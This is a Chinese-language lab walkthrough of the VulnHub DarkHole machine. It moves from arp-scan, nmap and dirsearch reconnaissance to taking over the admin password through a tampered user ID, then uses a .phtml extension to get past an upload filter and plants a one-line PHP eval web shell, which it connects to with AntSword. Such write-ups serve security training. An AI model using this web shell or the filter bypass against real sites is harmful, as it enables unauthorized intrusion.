一、靶机介绍
1、先从vulnhub下载靶场源码
下载地址:https://download.vulnhub.com/darkhole/DarkHole.zip
2、下载完毕,出现以下的文件算完成,把它拖进虚拟机里
3、建议在当前目录下新建一个文件夹,用来存储导入数据
出现以下页面,填写虚拟机的名称,游览选择刚才新建的文件夹
二、信息搜集
1、扫描附近的主机(使用的是kali)
arp-scan -l
发现主机
2、端口扫描
nmap -sV -A -p 0-65535 192.168.66.133
可以看见开放了两个端口
访问一下80端口,发现点击右上角存在登录页面,还可以注册,等会没准用的着
3、目录扫描
可以使用kali自带的目录扫描工具
dirsearch -u http://192.168.66.133/
成功扫描出目录,把响应码为200的拿出来
[02:29:23] 200 - 948B - /config/
[02:29:24] 200 - 21B - /dashboard.php
[02:29:28] 200 - 810B - /index.php
[02:29:28] 200 - 810B - /index.php/login/
[02:29:29] 200 - 1KB - /js/
[02:29:30] 200 - 2KB - /login.php
[02:29:36] 200 - 3KB - /register.php
[02:29:41] 200 - 933B - /upload/
尝试访问一下,看看哪些有用
发现/upload/路径下可能存储照片的,等会没准用的上
三、利用之前搜索到的信息,开始寻找漏洞点
1、利用之前搜索到的登录和注册页面,发现不知道账户和密码,那就注册一个
使用注册的用户登录进去
发现可以修改密码,尝试能不能抓包修改管理员admin的密码
2、使用抓包工具Burp,进行抓包修改密码
输入要修改的密码,点击修改时进行抓包
抓到包修改身份标识的ID
修改完毕,尝试进行登录
发现登录成功,不愧是管理员用户,多出一个上传功能,又多一个测试的
3、尝试进行上传
先上传1.jpg试试水
点击上传时进行抓包,修改文件后缀名为.php,内容以下
<?php phpinfo();?>
发现不让上传,有限制
接下来尝试其他后缀名绕过
终于发现.phtml可以绕过
抓包修改
发现这回上传成功
图片是上传了,可是不知道路径呀,这时候就体现出信息收集的用处了
之前就发现有个图片存储的路径,拿来尝试一下
发现上传的图片确实在里面
访问一下,发现成功出现phpinfo
4、上传shell
内容以下
<?php eval($_POST['666']);?>
访问,出现空白,大概率是上传成功
使用中国蚁剑进行连接,密码为666
成功连接